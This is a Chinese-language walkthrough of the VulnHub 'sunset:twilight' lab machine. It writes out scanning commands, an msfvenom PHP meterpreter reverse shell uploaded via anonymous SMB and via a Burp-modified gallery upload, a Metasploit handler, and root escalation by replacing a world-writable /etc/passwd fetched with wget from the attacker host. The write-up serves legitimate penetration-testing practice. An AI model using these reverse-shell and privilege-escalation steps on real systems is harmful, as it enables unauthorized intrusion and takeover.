PJzhang:vulnhub靶机sunset系列SUNSET:TWILIGHT

猫宁~~~

地址:https://www.vulnhub.com/entry/sunset-twilight,512/

关注工具和思路。

nmap 192.168.43.0/24
靶机IP
192.168.43.164

nmap -A -p1-65535 192.168.43.164

22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25/tcp open smtp Exim smtpd 4.92
80/tcp open http Apache httpd 2.4.38 ((Debian))
139/tcp open netbios-ssn netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open microsoft-ds netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
2121/tcp open ccproxy-ftp pyftpdlib 1.5.6
3306/tcp open mysql MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
8080/tcp open http-proxy PHP cli server 5.5 or later
63525/tcp open http PHP cli server 5.5 or later

enum4linux 192.168.43.164
WRKSHARE Disk Workplace Share. Do not access if not an employee.

smbclient //192.168.43.164/WRKSHARE,无密码登录
smb: >
cd varwwwhtml
smb: varwwwhtml>

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.154 LPORT=4444 -f raw >muma.php

smb下上传muma.php
smb: varwwwhtml> put muma.php

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.43.154
set lport 4444
run

访问http://192.168.43.164/muma.php,反弹shell

shell
python -c "import pty;pty.spawn('/bin/bash')"
www-data@twilight:/var/www/html$

cd /home
显示存在miguel的用户
cat /etc/passwd
miguel:x:1000:1000:,,,:/home/miguel:/bin/bash

ls -al /etc/passwd,有读写权限
-rwxrwxrwx 1 root root 1594 Jul 16 09:34 /etc/passwd

攻击机执行
openssl passwd -1 -salt useruser 123456

将靶机/etc/passwd复制到本地
最后一行添加
useruser:$1$useruser$8MVi1CAiLopcN8yk6Hj4B0:0:0:/root/root:/bin/bash

python3 -m http.server 80

wget http://192.168.43.154/passwd -O /etc/passwd

su useruser
id
uid=0(root) gid=0(root) groups=0(root)

利用上传接口获取shell

dirb http://192.168.43.3/

http://192.168.43.3/gallery/

http://192.168.43.3/gallery/original/,可以查看文件目录,例如上传的muma.php

重命名muma.php为muma.php.pjpeg

上传,burpsuite抓包,
Content-Type: image/jpeg
文件名重新修改为muma.php

上传成功

http://192.168.43.3/gallery/original/muma.php

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.154 LPORT=4444 -f raw >muma.php
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.43.154
set lport 4444
run

成功获取shell

【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/landesk/p/13688068.html